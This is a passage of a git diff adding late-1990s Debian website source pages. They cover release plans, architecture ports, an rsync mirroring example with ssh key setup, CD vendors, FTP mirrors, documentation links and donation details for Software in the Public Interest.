hamm) + <UL> + <LI>estimated release - late June 1998 + <LI>based on libc6 (all libraries compiled using -D_REENTRANT) + <LI>X 3.3.2.1 + <LI>Linux kernel 2.0.34 + <LI>Gimp 1.0 + <LI>Apache 1.3.0 + <LI>first public release for alpha, sparc and m68k architectures (may be + delayed until Debian 2.1). + </UL> + +<P><STRONG>Debian version 2.1</STRONG> (Nickname: slink) + <UL> + <LI>estimated release - not decided + <LI>Filesystem Hierarchy Standard (FHS) + <LI>other goals to be decided + </UL> + +<HR> +<A NAME="ports"><P><STRONG>Other architectures:</STRONG></A><BR> +Debian is working on releases for the following architectures. +[need status information on these] + +<UL> +<LI><STRONG>m68k</STRONG> +The m68k distribution was the first non-i386 architecture port and is +probably the most mature. There are Atari bootdisks and Amiga ones +should be done shortly. + +<P>Until recently there were problems with glibc2 on machines with an +68040 or 68060. Anyone with one of these machines should ensure that +they are using the latest glibc (libc6_2.0.5c-1) and a recent kernel +(2.0.31-pre2 or 2.1.57). + +<P>Approximately 80% of Debian packages have been compiled for +m68k. Anyone interested in installing the current snapshot of +Debian/m68k is encouraged to join the debian-68k mailing list and +review the mailing list archives to learn more about the state of the +system and hints for successful installation. It is intended that the +m68k port be ready for public release by the time Debian 2.0 is +released. +<LI><STRONG>alpha</STRONG><BR> +The Alpha distribution is now to a state where installation of a +functional system including the base system and a useful set of +development tools is quite possible from scratch. +Not all of the packages available for the x86 have been +ported yet, but the Alpha distribution was the first Debian distribution +to depend on libc6, and it is likely that the Alpha will be a supported +platform in Debian 2.0. + +<BR>Anyone interested in installing the current +snapshot of Debian for Alpha is encouraged to join the debian-alpha mailing +list and review the mailing list archives to learn more about the state of +the system and hints for successful installation. +<LI><STRONG>sparc</STRONG><BR> +The Sparc distribution is progressing, but is waiting for the port of glibc +to Sparc to stabilize before pushing for a release. +<BR>Anyone interested in installing the current +snapshot of Debian for Sparc is encouraged to join the debian-sparc mailing +list and review the mailing list archives to learn more about the state of +the system and hints for successful installation. +<LI><STRONG>mips</STRONG><BR> +*Very* early stage: only ~50 untested packages. +<LI><STRONG>powerpc</STRONG><BR> +Early stage; about 250 working packages, but no install procedure +yet. (No release date planned yet) +</UL> + +<P>Back to the <A HREF="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "devel", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/rsync_examples.wml b/english/devel/rsync_examples.wml new file mode 100644 index 00000000000..d88a7a47d4a --- /dev/null +++ b/english/devel/rsync_examples.wml @@ -0,0 +1,47 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Example rsync usage" + +<H1>Example rsync usage</H1> + +<P>The following is an example which will mirror both the web and ftp site. +You will have to modify the machine name and the directories involved to +match your situation. + +<P>The lockfile is useful if you run this using a cron job. If, for any reason, +the mirror doesn't complete, the next time the mirror tries to run you will get +mail. You can then track down where the problem lies, fix it, delete the lockfile and +the mirror will work properly the next time it is run. +<blockquote> +<pre> +#!/bin/bash +set -e + +lockfile -r 1 rsync.master.lock || exit 23 + +rsync -avz -e ssh --exclude .glbuild --delete <machine>:/web/debian.org/ debian.org +rsync -avz -e ssh --delete <machine>:/web/debian.org-local/ debian.org-local + +echo FINISHED UPDATING WEB. WORKING ON FTP NOW. + +rsync -avz --delete -e ssh <machine>:/debian debian + +rm -f rsync.master.lock +</pre> +</blockquote> + +<H3>How to set up ssh so you aren't asked for a password:</H3> + +The script given above will prompt you for a password unless you set up +ssh a certain way. First, when you use ssh-keygen, just hit return when +asked for a password [1]. Next, add the contents +of ~/.ssh/identity.pub to ~/.ssh/authorized_keys on the mirror site (the +file should be mode 600). +You should then be able to use ssh to log in to the mirror site without +being asked for a password. + +<P> +[1] Note that setting up ssh with a blank password gives an intruder free access +to the site you are mirroring once they have broken into your site. +For this reason, this should never be done from root. + +<:= languages ("$(HOME)", "devel", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/developers_corner.wml b/english/developers_corner.wml new file mode 100644 index 00000000000..8054476b879 --- /dev/null +++ b/english/developers_corner.wml @@ -0,0 +1,85 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Developer's Corner" + +<H1>Developer's Corner</H1> + +<P>The information on this page, while public, will primarily be of interest +to Debian developers. + +<HR> + +<TABLE width="100%"> +<TR valign=top> +<TD width="50%"> +<H3>General Information</H3> + <UL> + <LI><A HREF="devel/help">How you can help Debian</A> + <LI><A HREF="devel/people">The People behind Debian</A> + <LI>Location of some contributors to Debian around the world in a form compatible + with <A HREF="devel/developers.xearth">xearth</A>. An + <A HREF="devel/developers.gif">image</A> was made using that data. + <LI><A HREF="devel/maintainer_contacts">Debian contacts</A> + <LI><A HREF="ftp://ftp.debian.org/debian/doc/debian-keyring.tar.gz"> + Debian Maintainers PGP Keys</A>.<BR> + <UL><LI><A HREF="devel/extract_key">Extract a single key</A></UL> + </UL> + +<H3>Release Information</H3> + <UL> + <LI><A HREF="devel/release_info">Release Information</A> (currently out of date. See the + Release Roadmap) + <LI><A HREF="http://fatman.mathematik.tu-muenchen.de/~schwarz/debian-roadmap/">Release + Roadmap</A> + <LI>Due to the switch to libc6, the upgrade to hamm (development version of 2.0) from Debian 1.3 + requires special care. We therefore created an + <A HREF="2.0/autoup/">automatic upgrade</A> script. The libc5-libc6-Mini-HOWTO is included + there. + </UL> + +<H3>Debian Policy</H3> + <UL> + <LI><A HREF="doc/debian-policy/">Debian Policy Manual</A>. + <LI><A HREF="http://fatman.mathematik.tu-muenchen.de/~schwarz/debian-policy/">Debian + Policy Homepage</A> + <LI><A HREF="http://www.bekkoame.or.jp/~kamop/Debian/debian-policy.html">Japanese version of + the policy manual</A> + </UL> + +<TD width="*"> +<H3>Packaging Information</H3> + <UL> + <LI><A HREF="doc/prospective-packages.html">Prospective Packages</A> + <LI><A HREF="doc/packaging-manuals/developers-reference/">Debian Developer's + Reference</A> + <LI><A HREF="doc/packaging-manuals/packaging.html/">Debian Packaging Manual</A> + <LI><A HREF="http://va.debian.org/~jaldhar/index.html">Creating + a Package using Debmake</A> <small>(hopefully this and the following will be merged)</small> + <LI><A HREF="http://www.cis.udel.edu/~lowe/deb-make/">The New-Maintainer's + Debian Packaging Howto</A> + <LI><A HREF="doc/packaging-manuals/dpkg-internals/">dpkg Internals Manual</A> + <LI><A HREF="doc/packaging-manuals/menu.html/">The Debian Menu System</A> + <LI>Many developers find it useful to put their packages under CVS. This can + greatly simplify getting a new upstream release packaged. See + <A HREF="devel/HOWTO.cvs">HOWTO.cvs</A> for details. + </UL> + +<H3>Miscellaneous</H3> + <UL> + <LI><A HREF="devel/incoming_mirrors">Mirrors of Debian's Incoming + directory</A> + <LI>There is work being done to create a logical and consistent keyboard policy. + Check out the <A HREF="http://fatman.mathematik.tu-muenchen.de/~schwarz/debian-kbd/">Debian + Keyboard Configuration Project</A> + <LI>Debian has chosen a <A HREF="Pics/debian.jpg">logo</A>. We would like to make the + logo available to help promote Debian while protecting it from abuse. It may be used + as long as its use adheres to our <A HREF="logos/">license</A>. + <LI>Information on becoming an <A HREF="devel/mirror">Official Debian mirror</A> + <LI><A HREF="http://fatman.mathematik.tu-muenchen.de/~schwarz/debian-doc/">Debian + Documentation Project</A> + </UL> +</TABLE> + +<HR> +<P>Back to the <A HREF="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/distrib/distrib.wml b/english/distrib/distrib.wml new file mode 100644 index 00000000000..9e20546a0b8 --- /dev/null +++ b/english/distrib/distrib.wml @@ -0,0 +1,31 @@ +#!wml -o ../../../debian.org/distrib/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Distribution" + +<H1>Distribution</H1> + +<P>You probably entered this page because you would like to install Debian. +There are two methods of getting Debian: you can download the distribution +off the net (using FTP) or you can buy a set of CDs. + +<P>It is recommended that first time installers buy the CD set as the +installation is more straightforward. Many of the vendors sell the +distribution for less than US$5 plus shipping (check their web page to +see if they ship internationally). + +<P>The installation instructions for Debian can be found at +<a href="ftp://ftp.debian.org/debian/stable/disks-i386/current/install.html"> +ftp://ftp.debian.org/debian/stable/disks-i386/current/install.html</a>. +<BR><STRONG>The list of files you need for installation using the net can +be found in the installation instructions</STRONG>. + +<UL> +<LI><A HREF="packages">On-line list of Packages in Debian</A> - what software +does Debian include +<LI><A HREF="ftplist">Download via FTP</A> - getting Debian off the net +<LI><A HREF="vendors">Debian on CD</A> - list of CD vendors +</UL> + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "distrib", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/distrib/ftplist.wml b/english/distrib/ftplist.wml new file mode 100644 index 00000000000..b86ca2af274 --- /dev/null +++ b/english/distrib/ftplist.wml @@ -0,0 +1,41 @@ +#!wml -o ../../../debian.org/distrib/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — The FTP server network" + +<H1>The Debian FTP server network</H1> + +<P>Debian GNU/Linux is available on an FTP site near you: +<UL> +<LI><A href="ftp://ftp.at.debian.org/debian/">Austria</A> +<LI><A href="ftp://ftp.au.debian.org/debian/">Australia</A> +<LI><A href="ftp://ftp.de.debian.org/debian/">Germany</A> +<LI><A href="ftp://ftp.il.debian.org/debian/">Israel</A> +<LI><A href="ftp://ftp.jp.debian.org/debian/">Japan</A> +<LI><A href="ftp://ftp.kr.debian.org/debian/">Korea</A> +<LI><A href="ftp://ftp.debian.org/debian/">United States (GA)</A> +</UL> + +<P>You may want to look at the full +<A href="$(MISC)/README.mirrors">list of mirrors</A> +to find the machine closest to you. Note that geographic proximity is often +not very reliable for determining which machine will serve you best. You can +experiment to find the one that is best for you. + +<P>Also, there are sites that hold software that can not be distributed in the US. +The list of these sites can be found in the +<A href="$(MISC)/README.non-US">README.non-US</A>. + +<P>If you can find a site near you, please use it to download Debian. +It will probably work faster, and will reduce the load on our servers and +on the Internet as a whole. + +<P>Last but not least, take a look at the +<A href="ftp://ftp.debian.org/debian/dists/stable/main/disks-i386/current/install.html">Instructions +for Installing Debian</A>. +If you need additional help, be sure to look at the other +<A href="$(DOC)/">Debian documentation</A> or subscribe to +<A href="$(HOME)/support#mail_lists">debian-user</A> and ask questions there. + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "distrib", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/distrib/packages.wml b/english/distrib/packages.wml new file mode 100644 index 00000000000..ceb125f46c6 --- /dev/null +++ b/english/distrib/packages.wml @@ -0,0 +1,81 @@ +#!wml -o ../../../debian.org/distrib/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Packages" + +<H1>Packages</H1> + +<DL> +<DT><A href="$(HOME)/Packages/stable/"> + View the packages in the <STRONG>stable</STRONG> main, contrib, non-free and non-us distributions +</A> +<DD> +<DL> +<DT>Stable + <DD> The latest release of the main distribution of Debian. + All packages are available free of charge. + They are all released under a copyright that allows for free + redistribution and come with full source code. +<DT>Contrib + <DD> Packages in this directory are free themselves but depend on other + non-free software (like Motif or Qt). They can't be part + of a pure free software distribution like Debian <abbr>GNU</abbr>/Linux. +<DT>Non-Free + <DD> Packages in this directory do not necessarily cost money, but + have some onerous condition restricting the redistribution of the + software. +<DT>Non-US + <DD> These packages cannot be exported from the USA, they are + mostly encryption software packages. Some of them are non-free too. +</DL> +<DT><A href="$(HOME)/Packages/unstable/">View the packages in the <STRONG>unstable</STRONG> distributions</A> + <DD> This directory contains packages that are destined for the + main, contrib, non-free or non-us stable distributions above. + They have either not been fully tested (and could therefore + break your system) or have not been around long enough to make + it into the regular distribution. +</DL> + +<HR> +<H2>Search Package Directories</H2> +<FORM method="post" action="http://cgi.debian.org/cgi-bin/htsearch"> +<LABEL>Match: <SELECT name=method> +<OPTION value=and>AND +<OPTION value=or>OR +<OPTION value=boolean>BOOLEAN +</SELECT></LABEL> +<LABEL>Format: <SELECT name=format> +<OPTION value=builtin-long>Long +<OPTION value=builtin-short>Short +</SELECT></LABEL> +<INPUT type=hidden name=config value="htdig_packages"> +<INPUT type=hidden name=exclude value=""> +<BR> +<LABEL>Search: <INPUT type=text SIZE=30 name=words value=""></LABEL> +<INPUT type=submit value=Search> <INPUT type="reset"> +<BR>search in: +<LABEL><INPUT type=radio name=restrict value="/unstable"> unstable </LABEL> +<LABEL><INPUT type=radio name=restrict value="/stable/" CHECKED> stable </LABEL> +<LABEL><INPUT type=radio name=restrict value="/Packages/"> all packages</LABEL> +<BR>Note: substring searching currently isn't implemented. This can cause +problems. For example, you need to specify <KBD>libgtk1</KBD> to find libgtk. +</FORM> + +<HR> +<H2>Search the Contents of the Latest Release</H2> +<P> The search above will only search package headers and descriptions. +Thus, searches for many executables that are part of a package, but not +listed by name in the description will not work. Here, you can search the +contents of a release and find all packages that contains the given +keyword in any filename.<BR> +<FORM method=post ACTION="http://cgi.debian.org/cgi-bin/search_contents.pl"> +Search in: +<LABEL><INPUT type=radio name=version value=stable CHECKED> stable </LABEL> +<LABEL><INPUT type=radio name=version value="hamm_x86"> hamm (current unstable)</LABEL> +<BR> +<LABEL>Keyword: <INPUT type=text SIZE=30 name=word value=""></LABEL> +<INPUT type=submit value=Search> <INPUT type="reset"> +</FORM> + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "distrib", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/distrib/vendors.wml b/english/distrib/vendors.wml new file mode 100644 index 00000000000..390f851043a --- /dev/null +++ b/english/distrib/vendors.wml @@ -0,0 +1,179 @@ +#!wml -o ../../../debian.org/distrib/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — CD Manufacturers" + +<H1>CD Manufacturers</H1> + +<P>Debian provides Official CD “Masters” to all CD manufacturers +on request. Anyone can duplicate and sell the Official CD without having to +pay us any fee. CD manufacturers may also make non-official Debian CDs, +which may contain files added by the CD manufacturer as well as those +provided by Debian. ISO image files for the Debian 1.3.1 Official 2-CD Set +are now available at +<A href="ftp://ftp.debian.org/OfficialCD/">ftp://ftp.debian.org/OfficialCD/</A> +or one of the <A href="$(MISC)/CD.mirrors.txt">official CD mirrors</A>. +If you are interested in creating CDs containing Debian, make sure you read +the <A href="ftp://ftp.debian.org/debian/README.CD-manufacture">note to CD +manufacturers</A>. + +<H2>From contributing CD manufacturers</H2> + +<P>The companies listed in this section contribute a portion of the proceeds +from the sale of CDs to SPI, the non-profit corporation that oversees Debian. +See our <A href="$(HOME)/donations">donation page</A> for details. + +<UL> +<LI><STRONG>Flexible Software</STRONG> + <P> + Flexible Software can deliver Gold CD editions of the latest Debian release, + by post, to your door (or the door of a friend). For more details contact + <A href="mailto:dwarf@polaris.net">Dale Scheetz</A> or send US$30 + (check or money order, please no cash) to: + <BLOCKQUOTE> + Flexible Software<BR> + 11000 McCrackin Road<BR> + Tallahassee, FL 32308<BR> + </BLOCKQUOTE> + <P><SMALL> + Dale Scheetz is an active Debian developer. Dale maintains 12 Debian + packages, and puts a lot of time into supporting users on the + debian-user mailing list and refining the system design with our + developers. + </SMALL> + <P><SMALL> + His latest accomplishment has been “Drop in Debian” (DiD), + a small Debian installation suitable for building a custom kernel. + It installs on a DOS machine as a set of 5 files, one of which is a batch + program that starts up a kernel and gets the system running straight from + the DOS prompt. + </SMALL> + <P><SMALL> + This product is being distributed by Flexible Software on a Gold + CD that contains the complete 1.3 binary distribution for Intel machines, + but with a couple of patches to the kernel, the installation software can + be used to build your own DiD on any DOS machine. + </SMALL> + + <HR> + +<!-- +<LI><STRONG>Cistron Internet Services</STRONG> + <P> + <A href="http://www.cistron.nl/">Cistron</A> provides Debian 1.3.1 CDs, + especially to customers in or near the Netherlands. For details, see + their <A href="http://www.cistron.nl/debian/">web page</A>. + <P> + <SMALL> + Several of Cistron's employees develop and support free software + (a.k.a. open-source software), such as + sysvinit and minicom. + </SMALL> + + <HR> +--> + +<STRONG>CS Software</STRONG> + <P><A href="http://www.schwarz-online.com/">CS Software</A> offers weekly + updated Gold CDs of the Debian archive for customers in Europe. + <P> + Different CD-ROMs are available, including the latest stable release + and the current development versions. The CD-ROMs are available for i368 + and m68k platforms, and include additional packages from the contrib, + non-free, and non-us sections. For more information, please visit the + <A href="http://www.schwarz-online.com/cs-software/debian-cdrom/index.html">web page</A> + or send email to + <A href="mailto:schwarz@schwarz-online.com">Christian Schwarz</A>. + + <HR> + +<LI><STRONG>Greenbush Technologies.</STRONG> + + <P><A href="http://www.greenbush.com/">Greenbush Technologies Corporation</A> + offers freshly recorded Debian CD products, shipped worldwide. They offer + standard arrangements, customized arrangements, and subscription plans. + They promote and advocate use of Debian/GNU Linux by donating new CD sets + to schools, libraries, and other organizations. + See the <A href="http://www.greenbush.com/cds.html">announcement for + further details</A>, or send email to + <A href="mailto:cdinfo@greenbush.com">cdinfo@greenbush.com</A> + for a complete description and order form. + + <HR> + +<LI><STRONG>Linux Systems Labs.</STRONG> + <P><A href="http://www.lsl.com/">Linux Systems Labs</A> is offering the + 2-CD Official Debian release of Debian 1.3.1 for only US$3.95. To support + the Debian project, LSL is taking the initiative to help Debian + financially. The 2 CD set is also being offered for US$8.95. For each + copy sold at this price, a US$5.00 donation will be made to the Debian + Project. + + <P>For more information, please visit the LSL web site at: + <A href="http://www.lsl.com/catalog/software/debian-1.3/index.htm">http://www.lsl.com/catalog/software/debian-1.3/index.htm</A> + + <HR> + +<LI><STRONG>JF Lehmanns.</STRONG> + <P><A href="http://www.lob.de/">JF Lehmanns</A> made the first CD available which directly + supports Software in the Public Interest (SPI): for each CD shipped, 1 DM is donated to + the SPI. The current CD is 1.3.1. + More <A href="http://www2.Germany.EU.net/shop/JFL/linux/linkdebi.html">Information</A> + can be obtained directly from <A href="http://www.lob.de">JF Lehmanns</A>. + <P><SMALL>JF Lehmanns provides a mailing list for german speaking + users. Send "subscribe debian-user-de <your_email_address>" to majordomo@jfl.de</SMALL> + +<HR> + +<LI><STRONG>Cheap*Bytes.</STRONG> + + <P><A href="http://www.cheapbytes.com/">Cheap*Bytes</A>, a company that + specializes in low-cost Linux related products, is offering Debian + GNU/Linux 1.3.1r6 (1 CD-ROM) for US$1.99 + +<!-- + <P>If you would like to have a donation made to the Debian group, + there is an identical version of the above product for $6.99 which + includes a $5.00 donation to the Debian group. + See <A href="http://www.cheapbytes.com/">http://www.cheapbytes.com/</A> + for details. + +NOTE: ARE THEY STILL SELLING THE OFFICIAL DEBIAN 1.3.1 2 CD SET, +OR DO THEY ONLY SELL DEBIAN 1.3.1R6 NOW for $1.99? :-) + +--> + +<HR> +<LI><STRONG>Linux Emporium (UK)</STRONG> + + <P><A href="http://www.polo.demon.co.uk/emporium.html">The Linux Emporium</A> + in the UK distributes copies of the Debian Distribution as well as + Slackware, RedHat and Caldera. The Linux Emporium buys their CD's from + Linux System Labs in bulk to distribute at low cost to customers in the + UK. It is a non profit making organisation and initially donations will + help fund the project but once it is self funding any remaining cash is + intended to be donated to Debian. They sell the 2 CD Official Debian 1.3.1 + for £4.00 + £1.00 postage. + +</UL> + +<H2>From other manufacturers</H2> + +<P>If you manufacture CD-ROMs including Debian GNU/Linux +and want to contribute to or sponsor Debian development, +please contact the <A href="mailto:webmaster@debian.org">Webmaster</A>. + +<UL> +<LI>Debian GNU/Linux 1.1.11 is included on + <A href="http://www.yggdrasil.com/">yggdrasil</A>'s + <A href="http://www.yggdrasil.com/Products/winter97_ia.html">Winter 1997 Linux Internet Archives</A> + 6 CD set. +<LI><A href="http://www.netart.com.pl/">NetArt</A> sells Debian CDs in Poland. They can + be reached at <A href="mailto:netart@netart.com.pl">netart@netart.com.pl</A>. + +<BR> +<LI>There is also a + <A href="http://visar.csustan.edu:8000/giveaway.html">Linux CD Giveaway</A> list. + It is a list of people who are willing to give away their Linux CD once + they are done with them. +</UL> + +<:= languages ("$(HOME)", "distrib", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/doc/index.wml b/english/doc/index.wml new file mode 100644 index 00000000000..7047f3314ae --- /dev/null +++ b/english/doc/index.wml @@ -0,0 +1,66 @@ +#!wml -o ../../../debian.org/doc/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - User Documentation" + +<H1>User Documentation</H1> + +<H2>Frequently Asked Questions</H2> + +If you have a question that you can't figure out on your own, it is most +likely that others had the same question in the past. The answers of +frequently asked questions are kept in so-called FAQs and guess what: there +is one specially for Debian and another one for Linux in general. +<UL> +<LI><A HREF="FAQ/">The Debian FAQ</A> +<LI><A HREF="http://www.li.org/Resources/linux-faq/index.html">The Linux FAQ</A> +</UL> + +<HR> +<H2>Debian also has a user run FAQ</H2> +In addition to the traditional FAQ, +Debian has set up a <A HREF="http://www.debian.org/cgi-bin/fom">FAQOMATIC</A>. +It is a FAQ, where users can submit and answer +questions. With a large number of people helping to keep this current +(the entire Debian user base), this could become an invaluable resource. +This is just being developed so please submit your questions and answers - its success +depends on the users. + +<P>We are still looking for people to help administer this. If interested, +please contact Igor Grobman <<A HREF="mailto:igor@debian.org">igor@debian.org</A>>. + +<HR> +<H2>Installing Debian</H2> + +Information on the actual installation can be found in +<A HREF="ftp://ftp.debian.org/debian/stable/disks-i386/current/install.html">Installing Debian +GNU/Linux 1.3</A>. +Debian itself is available by <A HREF="../distrib/ftplist">FTP</A> or by buying a CD from a +<A HREF="$(DISTRIB)/vendors">vendor</A>. + +<P>Before installation, you might also want to check the +<A HREF="http://sunsite.unc.edu/mdw/HOWTO/Hardware-HOWTO.html">Linux Hardware Compatibility +HOWTO</A>. + +<HR> +<H2>Debian User's Manual</H2> + +*This is a work on progress *<BR> +Work is under way to create a +<A HREF="http://www.debian.org/~hp/debian-tutorial.html/">user manual</A> +for Debian. It is incomplete, but should still be useful. + +<HR> +<H2>The Debian Documentation Project</H2> + +The Debian Documentation Project was formed to coordinate the effort +of several Debian developers to write more and better documentation +for the Debian system. If you are interested, you can have a look at +our <a +href="http://fatman.mathematik.tu-muenchen.de/~schwarz/debian-doc/">home +page</a>. +<P> + + +<HR> +<P>Back to the <A HREF="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "doc", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/donations.wml b/english/donations.wml new file mode 100644 index 00000000000..6228f7f2047 --- /dev/null +++ b/english/donations.wml @@ -0,0 +1,120 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Donations to Software in the Public Interest" + +<H1>Donations to Software in the Public Interest +</H1> + +<UL> +<LI><A href="#money_donations">Donations of money</A><BR> +<LI><A href="#equipment_donations">Donations of equipment and services</A><BR> +</UL> + +<H2><A name="money_donations">Donations of money</A></H2> + +<P>Software in the Public Interest (a.k.a. Debian) is currently a +non-profit corporation under the laws of New York State. We are in the +process of petitioning the IRS to grant us 501(c)3 tax-exempt +non-profit status. + +<P>Although created by a volunteers throughout the world, Debian +has expenses that have, until now, been paid for out of the +pocket of a few of the developers. These expenses include +registering the debian.org domain, cutting CD's for testing new +releases, unreimbursed travel and lodging expenses while appearing +at conferences, etc. +It is hoped that annual donations will exceed the cost of these +expenses. + +<P>Many of the donations to date have been from appreciative users. +While all donations are welcome, it especially hoped that any +businesses that make money through Debian (CD manufacturers, +support companies, or even businesses that rely on Debian +for day to day operations) will contribute a percentage +of their profit to help make Debian GNU/Linux the best OS +it can be. Unfortunately, donations are not tax-deductible +until we are granted 501(c)3 status by the IRS. + +<P>To make a donation to make a check or money order out to: + <BLOCKQUOTE> + <STRONG>Software in the Public Interest</STRONG> + </BLOCKQUOTE> +and mail it to: + <BLOCKQUOTE> + <STRONG>Software in the Public Interest<BR> + PO Box 671<BR> + Ridge, NY 11961</STRONG> + </BLOCKQUOTE> + + +<P>To make an electronic transfer (this will work for non-US too), you need to +give your bank the routing number and account number as follows: + <BLOCKQUOTE> + <STRONG>Routing Number:</STRONG> 221471861<BR> + <STRONG>Account Number:</STRONG> 81913462718 + </BLOCKQUOTE> +Please note that wire transfers cost us US$10. + +<P>Let Tim Sailer <A href="mailto:tps@buoy.com"><tps@buoy.com></A> know +if you have problems with this. When you +have completed the electronic wire, please send a copy of the receipt to the +above address so there is a copy of your donation. +The copy you send to Tim is <STRONG>important</STRONG>. + +<P>A list of monetary donations to date can be found at +<A href="http://www.buoy.com/debian/misc/donate.pl">http://www.buoy.com/debian/misc/donate.pl</A>. + + +<H2><A name="equipment_donations">Donations of equipment and services</A></H2> + +<P>Given the small budget Debian runs on it is not possible, at this time, +for Debian to purchase and maintain it's own computers and network connections. +We therefore rely on the donation of equipment and services from companies and +universities to keep Debian connected to the world. + +<P>If your company has any idle machines or spare equipment (hard drives, SCSI +controllers, network cards, etc) lying around, please consider donating them to +Debian. Contact the +<A href="mailto:webmaster@debian.org"><webmaster@debian.org></A> for details. + +<P>The following is a list of the organizations that have donated +equipment or services to Debian: +<UL> +<LI><A href="http://www.cc.gatech.edu/">Georgia Tech's College of Computing</A> + provides <A href="ftp://ftp.debian.org/">ftp.debian.org</A>. +<LI><A href="http://www.novare.net/">Novare International</A> + provides the master system and the machine used as listserver for Debian. +<LI><A href="http://www.varesearch.com/">VA Research</A> + provides <A href="http://www.debian.org/">www.debian.org</A>. +<LI><A href="http://irc.linpeople.org/">LISC</A> supports Debian by hosting + the #debian channel at irc.debian.org . +<LI><A href="http://www.crosslink.net/">CrossLink</A> provides + <A href="http://www.us.debian.org/">www.us.debian.org</A> and a major FTP + mirror. +<LI><A href="http://www.waw.com/waw/">Web At Work</A> sponsors + <A href="http://www.fr.debian.org/">http://www.fr.debian.org/</A>. +<LI>The <A href="http://os.inf.tu-dresden.de/index_e.html">Operating Systems + Group</A> at <A href="http://www.tu-dresden.de/">Dresden University of + Technology</A> sponsors + <A href="http://www.de.debian.org/">http://www.de.debian.org/</A>. +<LI><SPAN lang=es><A href="http://www.es.debian.org/sponsor.html">El Departamento de Física Fundamental y Experimental</A></SPAN> + at + <SPAN lang=es><A href="http://www.dfis.ull.es/laguna.html">la Universidad de La Laguna</A></SPAN> + sponsors + <A href="http://www.es.debian.org/">http://www.es.debian.org/</A> + (don't you wish you lived in the Canary Islands!). +<LI><A href="http://www.softagency.co.jp/">SoftAgency Co. Ltd.</A> sponsors + <A href="http://www.jp.debian.org/">http://www.jp.debian.org/</A> +<LI><A href="http://www.TokyoNet.AD.JP/">TOKYO INTERNET</A> sponsors + <A href="ftp://ftp.jp.debian.org/pub/Linux/debian/">ftp://ftp.jp.debian.org/pub/Linux/debian/</A>. +<LI><A href="http://www.atnet.at/">AT-nctt</A> sponsors + <A href="http://www.at.debian.org/">http://www.at.debian.org/</A> and + <A href="ftp://ftp.at.debian.org/">ftp://ftp.at.debian.org/</A> +</UL> + +<P>Debian is grateful to these and all the groups around the world that +provide mirrors. Without them, none of this would have been possible. + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/index.wml b/english/index.wml new file mode 100644 index 00000000000..190e168a5b5 --- /dev/null +++ b/english/index.wml @@ -0,0 +1,54 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::mainpage title="Debian GNU/Linux — The Universal Operating System" +#use wml::debian::recent_news + +<H2>What is Debian?</H2> + +<P><A href="http://www.debian.org/">Debian</A> is a +<A HREF="intro/free">free, or Open Source</A>, operating system +(OS) for your computer. An operating system is the set of basic programs +and utilities that make your computer run. At the core of an operating +system is the kernel. The kernel is the most fundamental program on the +computer, does all the basic housekeeping and lets you start other +programs. Debian uses the <A href="http://www.linux.org/">Linux</A> +kernel, a free piece of software started by Linus Torvalds and +supported by (probably over 1000) programmers worldwide. A large part of +the basic tools that fill out the operating system come from +<A href="http://www.gnu.org/">GNU</A>, which are also free. Of course, the +thing that people want is software; tools to help them get what they want +to do done, from editing documents to running a business to playing games +to writing more software. Debian comes with over 1500 packages +(precompiled software bundled up in a nice format for easy installation on +your machine) — all of it <A HREF="intro/free">free</A>. + +<HR> + +<H2>Latest News</H2> + +<P> +<:= get_recent_news () :> +<P>For older news items see the <A href="$(HOME)/news">News Page</A>. + +<HR> +<H2>Debian 2.0 beta released <SMALL>(June 24)</SMALL></H2> +<H3>For a new installation</H3> +See the +<A href="2.0/install.html">Debian +2.0 installation instructions</A>. The list of files needed is in that document. +<H3>Upgrading</H3> +Read the <a href="news#19980624">Release Announcement</a> for details. +<H3>Buying a gold CD</H3> +A list of CD vendors that sell CDs of Debian 2.0 beta can be found +<a href="2.0/2.0beta_CD">here</a>. +<H3>CD images</H3> +Those who want to press their own CD images should go to +<a href="http://www.uk.debian.org/debian-cd/">http://www.uk.debian.org/debian-cd/</a> + +<HR> + +<P>Software in the Public Interest, the non-profit organization that oversees +Debian, is dedicated to making sure the hardware on your machine can +be used with any operating system. Please see our <A href="OpenHardware/">Open +Hardware Certification Program</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/intro/about.wml b/english/intro/about.wml new file mode 100644 index 00000000000..4ee8dff08e4 --- /dev/null +++ b/english/intro/about.wml @@ -0,0 +1,176 @@ +#!wml -o ../../../debian.org/intro/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — About Debian" + +<H1>About Debian</H1> + +<UL> +<LI><A href="#what">WHAT is Debian anyway?</A> +<LI><A href="#free">It's all free?</A> +<LI><A href="#CD">You say free but the 